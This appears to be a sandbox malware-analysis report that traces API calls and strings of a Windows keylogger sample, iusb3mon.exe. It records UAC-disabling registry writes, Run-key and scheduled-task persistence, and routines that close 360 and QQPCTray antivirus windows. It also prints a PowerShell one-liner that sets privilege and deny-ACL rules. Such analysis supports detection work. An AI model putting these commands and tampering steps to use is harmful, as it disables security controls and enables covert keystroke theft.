Associated: 0000001E.00000002.4667990029.0000000000441000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000443000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000445000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000447000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000449000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000044F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000451000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000045F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000462000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000467000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000469000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000046F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000471000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000473000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.0000000000497000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4667990029.000000000049C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001E.00000002.4678100485.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_340000_iusb3mon.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$CreateFacet_InitializeInstanceMessageRegisterSleepUninitialize_com_issue_error
String ID: C:\ProgramData\program\iusb3mon.exe$Failed to connect to Task Service.$Failed to create Task Service inst ance.$Failed to create task definition.$Failed to get root folder.$Failed to initialize COM library.$Failed to register task.$Task registered successfully.$User Name$UserLoginStartupTask
API String ID: 1252467509-2564446508
Opcode ID: ff1023c2738f85003f570447f52e52a9fa9ca824854624fa23898b9b7c79b61a
Instruction ID: 522f3505defbf31136bd3c5a6d16cb988f69c05833de44405c0190d55fddb159
Opcode Fuzzy Hash: ff1023c2738f85003f570447f52e52a9fa9ca824854624fa23898b9b7c79b61a
Instruction Fuzzy Hash: B3225F70E006099BDB12DFA8CC45BAEB7B8EF49304F118154F959FB251EB30BA85CB61

Function 06292BF0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 164
keyboardsynchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,KeyLogger), ref: 06292C05
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 06292C0E
Sleep.KERNEL32(0000000A), ref: 06292C6E
lstrlenA.KERNEL32(?), ref: 06292C7B
GetKeyState.USER32(00000010), ref: 06292CD9
GetAsyncKeyState.USER32(?), ref: 06292CEC
GetKeyState.USER32(00000014), ref: 06292CF9
GetKeyState.USER32(00000014), ref: 06292D25

Strings

KeyLogger, xrefs: 06292BFE
<BackSpace>, xrefs: 06292D90
<Enter>, xrefs: 06292DB0

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: State$AsyncCreateMutexObjectSingleSleepWaitlstrlen
String ID: <BackSpace>$<Enter>$KeyLogger
API String ID: 2104880762-1889060070
Opcode ID: e2c1298f3e0cf10c612b0c32be7421270e66db0c8be7a922603fb1998ba504f8
Instruction ID: 7fb02e4da4f0e210ff03b20f6566a4914c53ad021e34ded25451a621dd535eaf
Opcode Fuzzy Hash: e2c1298f3e0cf10c612b0c32be7421270e66db0c8be7a922603fb1998ba504f8
Instruction Fuzzy Hash: CC51D072D32619FFDFA0ABA49C4CB9A7769EFC1311F0140A1EE15A7280D6709B458F72

Function 06291B6D Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000BB8), ref: 06291B7A

Part of subcall function 06291B34: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06291B85), ref: 06291B47
Part of subcall function 06291B34: GetProcAddress.KERNEL32(00000000), ref: 06291B4E
Part of subcall function 06291B34: GetCurrentProcess.KERNEL32(00000000,?,?,?,06291B85), ref: 06291B5E

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,-00000200,?), ref: 06291BAD
RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004), ref: 06291BCB
RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004), ref: 06291BDC
RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004), ref: 06291BED
RegCloseKey.ADVAPI32(?), ref: 06291BF2

Strings

EnableLUA, xrefs: 06291BD4
PromptOnSecureDesktop, xrefs: 06291BE5
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 06291BA0
ConsentPromptBehaviorAdmin, xrefs: 06291BC3

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Value$AddressCloseCurrentHandleModuleOpenProcProcessSleep
String ID: ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 3477048420-3549642244
Opcode ID: cbfa9ab68439b8bd38bcf952274db19e3afda3b336cc48c362b62030e591a8bb
Instruction ID: b5b8d9f1f8b2a98aea65051a6b2f81023420c4518d865511d986712572d1dd6b
Opcode Fuzzy Hash: cbfa9ab68439b8bd38bcf952274db19e3afda3b336cc48c362b62030e591a8bb
Instruction Fuzzy Hash: DC0100B155020CBFEB519BA5DD8ADEF7F7DEBC1754F10006ABA01A1050DAB05E15EB70

Function 06295CE6 Relevance: 6.0, APIs: 4, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06295CF6
Process32First.KERNEL32(00000000,?), ref: 06295D0F
Process32Next.KERNEL32(00000000,00000128), ref: 06295D2A
CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06295D4F

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f925bfb5d769c6d6f1685ca3c2e29988dc37c215a81742d7d96822b43ba88511
Instruction ID: 02c4f39085577452ddd6e62c743869b36ed0a9741038654c5ee4cb985a5ed208
Opcode Fuzzy Hash: f925bfb5d769c6d6f1685ca3c2e29988dc37c215a81742d7d96822b43ba88511
Instruction Fuzzy Hash: A5F09C716113096BDFD1AE55DC84EEA77FCDB88354F1000A9ED44E2140DFB4C9654A31

Function 06295E1F Relevance: 68.6, APIs: 32, Strings: 7, Instructions: 330
registrysleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 06295CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06295CF6
Part of subcall function 06295CE6: Process32First.KERNEL32(00000000,?), ref: 06295D0F
Part of subcall function 06295CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06295D2A
Part of subcall function 06295CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06295D4F

RegOpenKeyExA.ADVAPI32(80000002,062BD344,00000000,00020119,?), ref: 06295E63
Sleep.KERNEL32(Q360SafeMonClass), ref: 06295E9D
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06295EA9
Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06295F0A
WinExec.KERNEL32(062BD22C,00000000), ref: 06295F16
RegOpenKeyExA.ADVAPI32(80000002,062BD344,00000000,00020119,?), ref: 06295F49
Sleep.KERNEL32(Q360SafeMonClass), ref: 06295F80
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06295F8C
RegOpenKeyExA.ADVAPI32(80000002,062BD344,00000000,00020119,?), ref: 06295FF6
Sleep.KERNEL32(000007D0), ref: 06296283

Part of subcall function 06295DA7: FindWindowA.USER32(?,00000000), ref: 06295DB1
Part of subcall function 06295DA7: PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06295DE5
Part of subcall function 06295DA7: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06295DF0

Sleep.KERNEL32(Q360SafeMonClass), ref: 06296035
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06296041
Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 0629609F
WinExec.KERNEL32(062BD22C,00000000), ref: 062960AB
Sleep.KERNEL32(Q360SafeMonClass), ref: 062960E1
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 062960ED

Part of subcall function 06297B7D: __EH_prolog.LIBCMT ref: 06297B82

Part of subcall function 06297109: __EH_prolog.LIBCMT ref: 0629710E

Part of subcall function 06297AC4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,062C8518,06296098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06297ADA
Part of subcall function 06297AC4: WriteFile.KERNEL32(00000000,062B8760,00000EE2,?,00000000), ref: 06297AF2
Part of subcall function 06297AC4: CloseHandle.KERNEL32(00000000), ref: 06297AFF

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?,0000000A), ref: 06296152
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0629615F
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0629617B
RegCloseKey.ADVAPI32(?), ref: 06296185
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 062961A0
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 062961B0
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 062961CC
RegCloseKey.ADVAPI32(?), ref: 062961D6
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?), ref: 062961F1
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06296201
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0629621D
RegCloseKey.ADVAPI32(?), ref: 06296227
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 06296242
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06296252
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 0629626E
RegCloseKey.ADVAPI32(?), ref: 06296278

Strings

qqpctray.exe, xrefs: 06295F21
Q360SafeMonClass, xrefs: 06295E8C, 06295EA4, 06295F6F, 06295F87, 06296024, 0629603C, 062960D0, 062960E8
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 062960B6, 06296148, 06296196, 062961E7, 06296238
C:\ProgramData\Microsoft\MicrosoftNetFramework.xml, xrefs: 06295EF9, 0629608E
C:\ProgramData\Program\iusb3mon.exe, xrefs: 06295E36, 0629616E, 062961B6, 062961BF, 06296207, 06296210, 06296258, 06296261
Microsoft, xrefs: 062960B1, 06296172, 062961C3, 06296214, 06296265
QQPCTray.exe, xrefs: 06295E3B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: OpenSleep$CloseFile$FindWindow$ModuleNameValue$CreateExecH_prologHandleMessageProcess32$FirstNextPostSendSnapshotToolhelp32Write
String ID: C:\ProgramData\Microsoft\MicrosoftNetFramework.xml$C:\ProgramData\Program\iusb3mon.exe$Microsoft$Q360SafeMonClass$QQPCTray.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$qqpctray.exe
API String ID: 3575359619-3011562891
Opcode ID: 845bb02eda65195ea5caac61eb97e7c130502d2219f9a960f63136e4f3031124
Instruction ID: 69c30191de875bc2bbb5487254382b60aa0ccaca31c0e3a312534c30f0ebd7e5
Opcode Fuzzy Hash: 845bb02eda65195ea5caac61eb97e7c130502d2219f9a960f63136e4f3031124
Instruction Fuzzy Hash: B5A18371378345BFEAC4AB60AC95EFA7A9DEFC0754F00081DFE95B5581DAA0C8058E72

Function 06296587 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 163
filesleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 062965AB
CreateDirectoryA.KERNEL32(?,00000000), ref: 06296600
SetFileAttributesA.KERNEL32(?,00000002,0000000A), ref: 0629663D
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 06296668

Part of subcall function 06297B7D: __EH_prolog.LIBCMT ref: 06297B82

Part of subcall function 06297109: __EH_prolog.LIBCMT ref: 0629710E

GetFileAttributesA.KERNEL32(C:\ProgramData\Program\iusb3mon.exe), ref: 06296673
CopyFileA.KERNEL32(?,?,00000000), ref: 06296690
CopyFileA.KERNEL32(C:\ProgramData\iusb3mon.dat,C:\ProgramData\Program\iusb3mon.dat,00000001), ref: 062966C6
CopyFileA.KERNEL32(C:\ProgramData\templateWatch.dat,C:\ProgramData\Program\templateWatch.dat,00000001), ref: 062966D5
Sleep.KERNEL32(000000C8), ref: 062966DC
WinExec.KERNEL32(cmd /c echo.>c:\inst.ini,00000000), ref: 06296739
Sleep.KERNEL32(000000C8), ref: 06296744

Strings

c:\inst.ini, xrefs: 06296722
C:\ProgramData\Program\templateWatch.dat, xrefs: 062966C8, 062966CF, 062966F8
C:\ProgramData\templateWatch.dat, xrefs: 062966D0
cmd /c echo.>c:\inst.ini, xrefs: 06296734
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 06296663
C:\ProgramData\Program\iusb3mon.exe, xrefs: 0629666E, 062966E4
C:\ProgramData\Program, xrefs: 062965E7
C:\ProgramData\Program\, xrefs: 062965B8
Create Successed!, xrefs: 06296643
C:\ProgramData\iusb3mon.dat, xrefs: 062966C1
360tray.exe, xrefs: 06296712
360Tray.exe, xrefs: 06296703
iusb3mon.exe, xrefs: 062965D9
C:\ProgramData\Program\iusb3mon.dat, xrefs: 062966B9, 062966C0, 062966F0
: Not Exist, xrefs: 0629660E

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Copy$AttributesExecH_prologSleep$CreateDirectoryModuleName
String ID: : Not Exist$360Tray.exe$360tray.exe$C:\ProgramData\Program$C:\ProgramData\Program\$C:\ProgramData\Program\iusb3mon.dat$C:\ProgramData\Program\iusb3mon.exe$C:\ProgramData\Program\templateWatch.dat$C:\ProgramData\iusb3mon.dat$C:\ProgramData\templateWatch.dat$Create Successed!$c:\inst.ini$cmd /c echo.>c:\inst.ini$iusb3mon.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')
API String ID: 1478482640-228079196
Opcode ID: 2bd9a52d653785ebb427d6fc9c70a8eb88c8b0bcb398f4b26fbd681c8df63b16
Instruction ID: db22390c4362403d6fa0fcba0f1414a2bedfe9e63d70531b2ef1bf2616283a19
Opcode Fuzzy Hash: 2bd9a52d653785ebb427d6fc9c70a8eb88c8b0bcb398f4b26fbd681c8df63b16
Instruction Fuzzy Hash: 8F41C43227434277E9D4B6B07C9AFEF3699DFC1B60F140919FE60AA0C0DEE495418A72

Function 0629650A Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 55
sleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowA.USER32(00000000,062BDD60), ref: 06296521
ShowWindow.USER32(00000000,00000000), ref: 06296525
FindWindowA.USER32(00000000,062BDD54), ref: 0629652D
ShowWindow.USER32(00000000,00000000), ref: 06296531
FindWindowA.USER32(00000000,062BDD44), ref: 06296539
ShowWindow.USER32(00000000,00000000), ref: 0629653D
FindWindowA.USER32(00000000,062BDD38), ref: 06296545
ShowWindow.USER32(00000000,00000000), ref: 06296549
FindWindowA.USER32(00000000,---------==============), ref: 06296551
ShowWindow.USER32(00000000,00000000), ref: 06296555
FindWindowA.USER32(00000000,===========-----------), ref: 0629655D
ShowWindow.USER32(00000000,00000000), ref: 06296561
FindWindowA.USER32(00000000,062BDCF8), ref: 06296569
SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06296574
Sleep.KERNEL32(000000C8), ref: 0629657F

Strings

===========-----------, xrefs: 06296557
---------==============, xrefs: 0629654B

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$Find$Show$MessageSendSleep
String ID: ---------==============$===========-----------
API String ID: 155205692-1512992862
Opcode ID: 991e03f61cc11dac74ea6ac153c6173f4e51e4e81dbec126c0c52fe2d8cde36e
Instruction ID: e537cbf23033e4e85ccf51dcf5c9f9d9cc6a7a75a1d8ce3e81605ec464351d91
Opcode Fuzzy Hash: 991e03f61cc11dac74ea6ac153c6173f4e51e4e81dbec126c0c52fe2d8cde36e
Instruction Fuzzy Hash: 58F0BDE1A9035E3AE96437B26CCDDEF1D5CDED47D97022C12BA85A604188F8DC058DB4

Function 0629571E Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46
synchronizationsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,huazai168.com,062BCC34,06296CAB), ref: 06295729
GetLastError.KERNEL32 ref: 06295731
CloseHandle.KERNEL32(00000000), ref: 0629573F
Sleep.KERNEL32(000003E8), ref: 06295761
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0629577F
CloseHandle.KERNEL32(00000000), ref: 06295786

Strings

huazai168.com, xrefs: 0629571F
LJPXYXC, xrefs: 06295722

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutexObjectSingleSleepWait
String ID: LJPXYXC$huazai168.com
API String ID: 3934243189-679209616
Opcode ID: 12435d8f27e416692635f5bdae545ae95410e20e3a5d5493d60d644f4c6a9aee
Instruction ID: 3d1ddd07065cc73a6fa6eb9d06f40ea072eb8e898138af101296b118ce88826a
Opcode Fuzzy Hash: 12435d8f27e416692635f5bdae545ae95410e20e3a5d5493d60d644f4c6a9aee
Instruction Fuzzy Hash: CBF06232513231BBD6A22B327C4DCEF2D1EDF876F1B150911FE0DA4140D6584502C9F1

Function 06296780 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 26
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadExecutionState.KERNEL32(80000003), ref: 0629678E
SetThreadExecutionState.KERNEL32(80000003), ref: 06296791
SetThreadExecutionState.KERNEL32(80000001), ref: 0629679C
Sleep.KERNEL32(000003E8), ref: 062967AE
OutputDebugStringA.KERNEL32(Thread running...), ref: 062967B9
OutputDebugStringA.KERNEL32(Thread Exit...), ref: 062967C3

Strings

Thread Exit..., xrefs: 062967BE
Thread running..., xrefs: 062967B4

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExecutionStateThread$DebugOutputString$Sleep
String ID: Thread Exit...$Thread running...
API String ID: 3332416543-10974087
Opcode ID: 3f48f090af7a244fe737cb1019037cd3c69e69530bd672fc899f80dcbc2859cf
Instruction ID: 840341a3a153516815aa414edac2e6a6cc95c88d9e95e023bda39864106bc57f
Opcode Fuzzy Hash: 3f48f090af7a244fe737cb1019037cd3c69e69530bd672fc899f80dcbc2859cf
Instruction Fuzzy Hash: FDE02632E7033667EB9127B4BC84EEE6999DFD5760B160427EE04A310096906C024EF2

Function 06295DA7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06295DE5
SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06295DF0
FindWindowA.USER32(?,00000000), ref: 06295DB1

Part of subcall function 06297B7D: __EH_prolog.LIBCMT ref: 06297B82

Part of subcall function 06297109: __EH_prolog.LIBCMT ref: 0629710E

Strings

C:\ProgramData\Program\iusb3mon.exe, xrefs: 06295DA8

Memory Dump Source

Source File: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, Offset: 06290000, based on PE: true

Associated: 0000001E.00000002.4680124112.00000000062C1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062C8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000001E.00000002.4680124112.00000000062CA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_6290000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prologMessage$FindPostSendWindow
String ID: C:\ProgramData\Program\iusb3mon.exe
API String ID: 1670880786-3106534563
Opcode ID: e2564e62611ad972b1fbe5cda92c223be961cd1a0850b52ee298cfe1cb0104d4
Instruction ID: a1dc499ed11cfb41c40f878eb19b51ae19fb2b7abc0d372dc9e0d63c3f2b161e
Opcode Fuzzy Hash: e2564e62611ad972b1fbe5cda92c223be961cd1a0850b52ee298cfe1cb0104d4
Instruction Fuzzy Hash: D4F0C2723703252FE99926607CA9EBE1559CBC0BA1F110429FD6179180CEE00C0215B6

Function 06298D1A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06298D33

Part of subcall function 0629B39D: CreateThread.KERNEL32(?,06298D56,0629B408,00000000,00000000,?), ref: 0629B3DE
Part of subcall function 0629B39D: GetLastError.KERNEL32(?,06298D56,?,?,06298CE2,?,?,?), ref: 0629B3E8

